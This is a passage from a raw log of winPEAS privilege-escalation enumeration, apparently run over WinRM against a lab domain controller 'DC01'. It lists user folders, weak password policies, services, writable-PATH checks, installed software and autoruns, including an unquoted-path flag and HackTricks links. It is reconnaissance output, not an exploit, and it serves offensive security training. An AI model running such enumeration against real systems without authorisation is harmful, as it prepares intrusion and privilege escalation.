WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Ever logged users
504
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied
505
WINRM       172.16.55.128   5985   DC01                 Not Found
506
WINRM       172.16.55.128   5985   DC01
507
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Home folders found
508
WINRM       172.16.55.128   5985   DC01                 C:\Users\Administrator
509
WINRM       172.16.55.128   5985   DC01                 C:\Users\administrator .LOOKBACK : administrator  [Allow: AllAccess]
510
WINRM       172.16.55.128   5985   DC01                 C:\Users\All Users
511
WINRM       172.16.55.128   5985   DC01                 C:\Users\db-admin
512
WINRM       172.16.55.128   5985   DC01                 C:\Users\Default
513
WINRM       172.16.55.128   5985   DC01                 C:\Users\Default User
514
WINRM       172.16.55.128   5985   DC01                 C:\Users\Public
515
WINRM       172.16.55.128   5985   DC01                 C:\Users\Service_Maintainer
516
WINRM       172.16.55.128   5985   DC01
517
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for AutoLogon credentials
518
WINRM       172.16.55.128   5985   DC01                 Some AutoLogon credentials were found
519
WINRM       172.16.55.128   5985   DC01                 DefaultDomainName             :  LOOKBACK
520
WINRM       172.16.55.128   5985   DC01
521
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Password Policies
522
WINRM       172.16.55.128   5985   DC01             È Check for a possible brute-force
523
WINRM       172.16.55.128   5985   DC01                 Domain: Builtin
524
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-32
525
WINRM       172.16.55.128   5985   DC01                 MaxPasswordAge: 42.22:47:31.7437440
526
WINRM       172.16.55.128   5985   DC01                 MinPasswordAge: 00:00:00
527
WINRM       172.16.55.128   5985   DC01                 MinPasswordLength: 0
528
WINRM       172.16.55.128   5985   DC01                 PasswordHistoryLength: 0
529
WINRM       172.16.55.128   5985   DC01                 PasswordProperties: 0
530
WINRM       172.16.55.128   5985   DC01                =================================================================================================
531
WINRM       172.16.55.128   5985   DC01
532
WINRM       172.16.55.128   5985   DC01                 Domain: LOOKBACK
533
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-21-3830242231-3868280746-2763890440
534
WINRM       172.16.55.128   5985   DC01                 MaxPasswordAge: 42.00:00:00
535
WINRM       172.16.55.128   5985   DC01                 MinPasswordAge: 1.00:00:00
536
WINRM       172.16.55.128   5985   DC01                 MinPasswordLength: 0
537
WINRM       172.16.55.128   5985   DC01                 PasswordHistoryLength: 24
538
WINRM       172.16.55.128   5985   DC01                 PasswordProperties: 0
539
WINRM       172.16.55.128   5985   DC01                =================================================================================================
540
WINRM       172.16.55.128   5985   DC01
541
WINRM       172.16.55.128   5985   DC01
542
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Print Logon Sessions
543
WINRM       172.16.55.128   5985   DC01
544
WINRM       172.16.55.128   5985   DC01
545
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Processes Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
546
WINRM       172.16.55.128   5985   DC01
547
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Interesting Processes -non Microsoft-
548
WINRM       172.16.55.128   5985   DC01             È Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#running-processes
549
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied
550
WINRM       172.16.55.128   5985   DC01
551
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Vulnerable Leaked Handlers
552
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#leaked-handlers
553
WINRM       172.16.55.128   5985   DC01             È Getting Leaked Handlers, it might take some time...
554
WINRM       172.16.55.128   5985   DC01             [#########-]  99% |                       Not Found
555
WINRM       172.16.55.128   5985   DC01
556
WINRM       172.16.55.128   5985   DC01
557
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Services Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
558
WINRM       172.16.55.128   5985   DC01               [X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
559
WINRM       172.16.55.128   5985   DC01
560
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Interesting Services -non Microsoft-
561
WINRM       172.16.55.128   5985   DC01             È Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
562
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied
563
WINRM       172.16.55.128   5985   DC01                 @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver(PMC-Sierra, Inc. - @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver)[System32\drivers\arcsas.sys] - Boot
564
WINRM       172.16.55.128   5985   DC01                =================================================================================================
565
WINRM       172.16.55.128   5985   DC01
566
WINRM       172.16.55.128   5985   DC01                 @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD(QLogic Corporation - @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD)[System32\drivers\bxvbda.sys] - Boot
567
WINRM       172.16.55.128   5985   DC01                =================================================================================================
568
WINRM       172.16.55.128   5985   DC01
569
WINRM       172.16.55.128   5985   DC01                 @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver(Marvell Semiconductor Inc. - @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver)[System32\drivers\bxfcoe.sys] - Boot
570
WINRM       172.16.55.128   5985   DC01                =================================================================================================
571
WINRM       172.16.55.128   5985   DC01
572
WINRM       172.16.55.128   5985   DC01                 @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver(Marvell Semiconductor Inc. - @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver)[System32\drivers\bxois.sys] - Boot
573
WINRM       172.16.55.128   5985   DC01                =================================================================================================
574
WINRM       172.16.55.128   5985   DC01
575
WINRM       172.16.55.128   5985   DC01                 @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver(Chelsio Communications - @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver)[C:\Windows\System32\drivers\cht4vx64.sys] - System
576
WINRM       172.16.55.128   5985   DC01                =================================================================================================
577
WINRM       172.16.55.128   5985   DC01
578
WINRM       172.16.55.128   5985   DC01                 @nete1g3e.inf,%e1000.Service.DispName%;Intel(R) PRO/1000 NDIS 6 Adapter Driver(Intel Corporation - @nete1g3e.inf,%e1000.Service.DispName%;Intel(R) PRO/1000 NDIS 6 Adapter Driver)[C:\Windows\System32\drivers\E1G6032E.sys] - System
579
WINRM       172.16.55.128   5985   DC01                =================================================================================================
580
WINRM       172.16.55.128   5985   DC01
581
WINRM       172.16.55.128   5985   DC01                 @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I(Intel Corporation - @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I)[C:\Windows\System32\drivers\e1i68x64.sys] - System
582
WINRM       172.16.55.128   5985   DC01                =================================================================================================
583
WINRM       172.16.55.128   5985   DC01
584
WINRM       172.16.55.128   5985   DC01                 @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD(Marvell Semiconductor Inc. - @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD)[System32\drivers\evbda.sys] - Boot
585
WINRM       172.16.55.128   5985   DC01                =================================================================================================
586
WINRM       172.16.55.128   5985   DC01
587
WINRM       172.16.55.128   5985   DC01                 @netevbd0a.inf,%vbd_srv_desc%;QLogic Legacy Ethernet Adapter VBD(QLogic Corporation - @netevbd0a.inf,%vbd_srv_desc%;QLogic Legacy Ethernet Adapter VBD)[System32\drivers\evbd0a.sys] - Boot
588
WINRM       172.16.55.128   5985   DC01                =================================================================================================
589
WINRM       172.16.55.128   5985   DC01
590
WINRM       172.16.55.128   5985   DC01                 @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver(Intel Corporation - @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_GPIO.sys] - System
591
WINRM       172.16.55.128   5985   DC01                =================================================================================================
592
WINRM       172.16.55.128   5985   DC01
593
WINRM       172.16.55.128   5985   DC01                 @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver(Intel Corporation - @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_I2C.sys] - System
594
WINRM       172.16.55.128   5985   DC01                =================================================================================================
595
WINRM       172.16.55.128   5985   DC01
596
WINRM       172.16.55.128   5985   DC01                 @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller(Intel Corporation - @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller)[System32\drivers\iaStorAVC.sys] - Boot
597
WINRM       172.16.55.128   5985   DC01                =================================================================================================
598
WINRM       172.16.55.128   5985   DC01
599
WINRM       172.16.55.128   5985   DC01                 @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7(Intel Corporation - @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7)[System32\drivers\iaStorV.sys] - Boot
600
WINRM       172.16.55.128   5985   DC01                =================================================================================================
601
WINRM       172.16.55.128   5985   DC01
602
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver)(Mellanox - @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver))[C:\Windows\System32\drivers\ibbus.sys] - System
603
WINRM       172.16.55.128   5985   DC01                =================================================================================================
604
WINRM       172.16.55.128   5985   DC01
605
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator(Mellanox - @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator)[C:\Windows\System32\drivers\mlx4_bus.sys] - System
606
WINRM       172.16.55.128   5985   DC01                =================================================================================================
607
WINRM       172.16.55.128   5985   DC01
608
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service(Mellanox - @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service)[C:\Windows\System32\drivers\ndfltr.sys] - System
609
WINRM       172.16.55.128   5985   DC01                =================================================================================================
610
WINRM       172.16.55.128   5985   DC01
611
WINRM       172.16.55.128   5985   DC01                 NDKPerf Driver(NDKPerf Driver)[system32\drivers\NDKPerf.sys] - System
612
WINRM       172.16.55.128   5985   DC01                =================================================================================================
613
WINRM       172.16.55.128   5985   DC01
614
WINRM       172.16.55.128   5985   DC01                 @pvscsii.inf,%pvscsi.DiskName%;pvscsi Storage Controller Driver(VMware, Inc. - @pvscsii.inf,%pvscsi.DiskName%;pvscsi Storage Controller Driver)[System32\drivers\pvscsii.sys] - Boot
615
WINRM       172.16.55.128   5985   DC01                =================================================================================================
616
WINRM       172.16.55.128   5985   DC01
617
WINRM       172.16.55.128   5985   DC01                 @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD(Marvell Semiconductor Inc. - @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD)[System32\drivers\qevbda.sys] - Boot
618
WINRM       172.16.55.128   5985   DC01                =================================================================================================
619
WINRM       172.16.55.128   5985   DC01
620
WINRM       172.16.55.128   5985   DC01                 @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver(Marvell Semiconductor Inc. - @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver)[System32\drivers\qefcoe.sys] - Boot
621
WINRM       172.16.55.128   5985   DC01                =================================================================================================
622
WINRM       172.16.55.128   5985   DC01
623
WINRM       172.16.55.128   5985   DC01                 @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver(Marvell Semiconductor Inc. - @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver)[System32\drivers\qeois.sys] - Boot
624
WINRM       172.16.55.128   5985   DC01                =================================================================================================
625
WINRM       172.16.55.128   5985   DC01
626
WINRM       172.16.55.128   5985   DC01                 @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64)(Marvell Semiconductor Inc. - @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64))[System32\drivers\ql2300i.sys] - Boot
627
WINRM       172.16.55.128   5985   DC01                =================================================================================================
628
WINRM       172.16.55.128   5985   DC01
629
WINRM       172.16.55.128   5985   DC01                 @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver(QLogic Corporation - @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver)[System32\drivers\ql40xx2i.sys] - Boot
630
WINRM       172.16.55.128   5985   DC01                =================================================================================================
631
WINRM       172.16.55.128   5985   DC01
632
WINRM       172.16.55.128   5985   DC01                 @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64))[System32\drivers\qlfcoei.sys] - Boot
633
WINRM       172.16.55.128   5985   DC01                =================================================================================================
634
WINRM       172.16.55.128   5985   DC01
635
WINRM       172.16.55.128   5985   DC01                 SQL Server Agent (MSSQLSERVER)(SQL Server Agent (MSSQLSERVER))["C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE" -i MSSQLSERVER] - System
636
WINRM       172.16.55.128   5985   DC01                 Executes jobs, monitors SQL Server, fires alerts, and allows automation of some administrative tasks.
637
WINRM       172.16.55.128   5985   DC01                =================================================================================================
638
WINRM       172.16.55.128   5985   DC01
639
WINRM       172.16.55.128   5985   DC01                 OpenSSH Authentication Agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Manual
640
WINRM       172.16.55.128   5985   DC01                 Agent to hold private keys used for public key authentication.
641
WINRM       172.16.55.128   5985   DC01                =================================================================================================
642
WINRM       172.16.55.128   5985   DC01
643
WINRM       172.16.55.128   5985   DC01                 @Usb4HostRouter.inf,%Usb4HostRouter.SVCDESC%;USB4 Host Router Service(@Usb4HostRouter.inf,%Usb4HostRouter.SVCDESC%;USB4 Host Router Service)[C:\Windows\System32\drivers\Usb4HostRouter.sys] - System
644
WINRM       172.16.55.128   5985   DC01                =================================================================================================
645
WINRM       172.16.55.128   5985   DC01
646
WINRM       172.16.55.128   5985   DC01                 @usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver(@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver)[C:\Windows\System32\drivers\USBSTOR.SYS] - System
647
WINRM       172.16.55.128   5985   DC01                =================================================================================================
648
WINRM       172.16.55.128   5985   DC01
649
WINRM       172.16.55.128   5985   DC01                 @usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller(@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller)[C:\Windows\System32\drivers\USBXHCI.SYS] - System
650
WINRM       172.16.55.128   5985   DC01                =================================================================================================
651
WINRM       172.16.55.128   5985   DC01
652
WINRM       172.16.55.128   5985   DC01                 VMware Alias Manager and Ticket Service(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Autoload
653
WINRM       172.16.55.128   5985   DC01                 Alias Manager and Ticket Service
654
WINRM       172.16.55.128   5985   DC01                =================================================================================================
655
WINRM       172.16.55.128   5985   DC01
656
WINRM       172.16.55.128   5985   DC01                 @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service(VMware, Inc. - @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service)[C:\Windows\system32\vm3dservice.exe] - Autoload
657
WINRM       172.16.55.128   5985   DC01                 @oem8.inf,%VM3DSERVICE_DESCRIPTION%;Helps VMware SVGA driver by collecting and conveying user mode information
658
WINRM       172.16.55.128   5985   DC01                =================================================================================================
659
WINRM       172.16.55.128   5985   DC01
660
WINRM       172.16.55.128   5985   DC01                 @oem2.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver(Broadcom Inc. - @oem2.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver)[System32\drivers\vmci.sys] - Boot
661
WINRM       172.16.55.128   5985   DC01                =================================================================================================
662
WINRM       172.16.55.128   5985   DC01
663
WINRM       172.16.55.128   5985   DC01                 VMware Host Guest Client Redirector(VMware, Inc. - VMware Host Guest Client Redirector)[system32\DRIVERS\vmhgfs.sys] - System
664
WINRM       172.16.55.128   5985   DC01                 Implements the VMware HGFS protocol. This protocol provides connectivity to host files provided by the HGFS server.
665
WINRM       172.16.55.128   5985   DC01                =================================================================================================
666
WINRM       172.16.55.128   5985   DC01
667
WINRM       172.16.55.128   5985   DC01                 Memory Control Driver(VMware, Inc. - Memory Control Driver)[C:\Windows\system32\DRIVERS\vmmemctl.sys] - Autoload
668
WINRM       172.16.55.128   5985   DC01                 Driver to provide enhanced memory management of this virtual machine.
669
WINRM       172.16.55.128   5985   DC01                =================================================================================================
670
WINRM       172.16.55.128   5985   DC01
671
WINRM       172.16.55.128   5985   DC01                 @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device(VMware, Inc. - @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device)[C:\Windows\System32\drivers\vmmouse.sys] - System
672
WINRM       172.16.55.128   5985   DC01                =================================================================================================
673
WINRM       172.16.55.128   5985   DC01
674
WINRM       172.16.55.128   5985   DC01                 VMware Physical Disk Helper(VMware, Inc. - VMware Physical Disk Helper)[C:\Windows\system32\DRIVERS\vmrawdsk.sys] - System
675
WINRM       172.16.55.128   5985   DC01                 VMware Physical Disk Helper
676
WINRM       172.16.55.128   5985   DC01                =================================================================================================
677
WINRM       172.16.55.128   5985   DC01
678
WINRM       172.16.55.128   5985   DC01                 VMware Tools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Autoload
679
WINRM       172.16.55.128   5985   DC01                 Provides support for synchronizing objects between the host and guest operating systems.
680
WINRM       172.16.55.128   5985   DC01                =================================================================================================
681
WINRM       172.16.55.128   5985   DC01
682
WINRM       172.16.55.128   5985   DC01                 @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device(VMware, Inc. - @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device)[C:\Windows\System32\drivers\vmusbmouse.sys] - System
683
WINRM       172.16.55.128   5985   DC01                =================================================================================================
684
WINRM       172.16.55.128   5985   DC01
685
WINRM       172.16.55.128   5985   DC01                 vSockets Virtual Machine Communication Interface Sockets driver(VMware, Inc. - vSockets Virtual Machine Communication Interface Sockets driver)[system32\DRIVERS\vsock.sys] - Boot
686
WINRM       172.16.55.128   5985   DC01                 vSockets Driver
687
WINRM       172.16.55.128   5985   DC01                =================================================================================================
688
WINRM       172.16.55.128   5985   DC01
689
WINRM       172.16.55.128   5985   DC01                 @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver(VIA Corporation - @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver)[System32\drivers\vstxraid.sys] - Boot
690
WINRM       172.16.55.128   5985   DC01                =================================================================================================
691
WINRM       172.16.55.128   5985   DC01
692
WINRM       172.16.55.128   5985   DC01                 @%SystemRoot%\System32\drivers\vwifibus.sys,-257(@%SystemRoot%\System32\drivers\vwifibus.sys,-257)[C:\Windows\System32\drivers\vwifibus.sys] - System
693
WINRM       172.16.55.128   5985   DC01                 @%SystemRoot%\System32\drivers\vwifibus.sys,-258
694
WINRM       172.16.55.128   5985   DC01                =================================================================================================
695
WINRM       172.16.55.128   5985   DC01
696
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service(Mellanox - @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service)[C:\Windows\System32\drivers\winmad.sys] - System
697
WINRM       172.16.55.128   5985   DC01                =================================================================================================
698
WINRM       172.16.55.128   5985   DC01
699
WINRM       172.16.55.128   5985   DC01                 @winusb.inf,%WINUSB_SvcName%;WinUsb Driver(@winusb.inf,%WINUSB_SvcName%;WinUsb Driver)[C:\Windows\System32\drivers\WinUSB.SYS] - System
700
WINRM       172.16.55.128   5985   DC01                 @winusb.inf,%WINUSB_SvcDesc%;Generic driver for USB devices
701
WINRM       172.16.55.128   5985   DC01                =================================================================================================
702
WINRM       172.16.55.128   5985   DC01
703
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service(Mellanox - @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service)[C:\Windows\System32\drivers\winverbs.sys] - System
704
WINRM       172.16.55.128   5985   DC01                =================================================================================================
705
WINRM       172.16.55.128   5985   DC01
706
WINRM       172.16.55.128   5985   DC01
707
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Modifiable Services
708
WINRM       172.16.55.128   5985   DC01             È Check if you can modify any service https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
709
WINRM       172.16.55.128   5985   DC01                 You cannot modify any service
710
WINRM       172.16.55.128   5985   DC01
711
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking if you can modify any service registry
712
WINRM       172.16.55.128   5985   DC01             È Check if you can modify the registry of a service https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services-registry-modify-permissions
713
WINRM       172.16.55.128   5985   DC01                 [-] Looks like you cannot change the registry of any service...
714
WINRM       172.16.55.128   5985   DC01
715
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking write permissions in PATH folders (DLL Hijacking)
716
WINRM       172.16.55.128   5985   DC01             È Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking
717
WINRM       172.16.55.128   5985   DC01                 C:\Windows\system32
718
WINRM       172.16.55.128   5985   DC01                 C:\Windows
719
WINRM       172.16.55.128   5985   DC01                 C:\Windows\System32\Wbem
720
WINRM       172.16.55.128   5985   DC01                 C:\Windows\System32\WindowsPowerShell\v1.0\
721
WINRM       172.16.55.128   5985   DC01                 C:\Windows\System32\OpenSSH\
722
WINRM       172.16.55.128   5985   DC01                 C:\Program Files (x86)\Microsoft SQL Server\160\Tools\Binn\
723
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server\160\Tools\Binn\
724
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\
725
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server\160\DTS\Binn\
726
WINRM       172.16.55.128   5985   DC01
727
WINRM       172.16.55.128   5985   DC01
728
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Applications Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
729
WINRM       172.16.55.128   5985   DC01
730
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current Active Window Application
731
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.
732
WINRM       172.16.55.128   5985   DC01
733
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Installed Applications --Via Program Files/Uninstall registry--
734
WINRM       172.16.55.128   5985   DC01             È Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
735
WINRM       172.16.55.128   5985   DC01                 C:\Program Files (x86)\Microsoft Visual Studio\Installer
736
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Common Files
737
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\desktop.ini
738
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Internet Explorer
739
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft
740
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server
741
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server Management Studio 21
742
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft Visual Studio 10.0
743
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft.NET
744
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\ModifiableWindowsApps
745
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\PackageManagement
746
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Uninstall Information
747
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\VMware
748
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Defender
749
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Defender Advanced Threat Protection
750
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Mail
751
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Media Player
752
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows NT
753
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Photo Viewer
754
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Sidebar
755
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\WindowsApps
756
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\WindowsPowerShell
757
WINRM       172.16.55.128   5985   DC01
758
WINRM       172.16.55.128   5985   DC01
759
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Autorun Applications
760
WINRM       172.16.55.128   5985   DC01             È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
761
WINRM       172.16.55.128   5985   DC01             Error getting autoruns from WMIC: System.Management.ManagementException: Access denied
762
WINRM       172.16.55.128   5985   DC01                at System.Management.ThreadDispatch.Start()
763
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementScope.Initialize()
764
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementObjectSearcher.Initialize()
765
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementObjectSearcher.Get()
766
WINRM       172.16.55.128   5985   DC01                at winPEAS.Info.ApplicationInfo.AutoRuns.GetAutoRunsWMIC()
767
WINRM       172.16.55.128   5985   DC01
768
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
769
WINRM       172.16.55.128   5985   DC01                 Key: SecurityHealth
770
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\system32
771
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\system32\SecurityHealthSystray.exe
772
WINRM       172.16.55.128   5985   DC01                =================================================================================================
773
WINRM       172.16.55.128   5985   DC01
774
WINRM       172.16.55.128   5985   DC01
775
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
776
WINRM       172.16.55.128   5985   DC01                 Key: VMware User Process
777
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files\VMware\VMware Tools
778
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected) - C:\
779
WINRM       172.16.55.128   5985   DC01                =================================================================================================
780
WINRM       172.16.55.128   5985   DC01
781
WINRM       172.16.55.128   5985   DC01
782
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
783
WINRM       172.16.55.128   5985   DC01                 Key: Common Startup
784
WINRM       172.16.55.128   5985   DC01                 Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
785
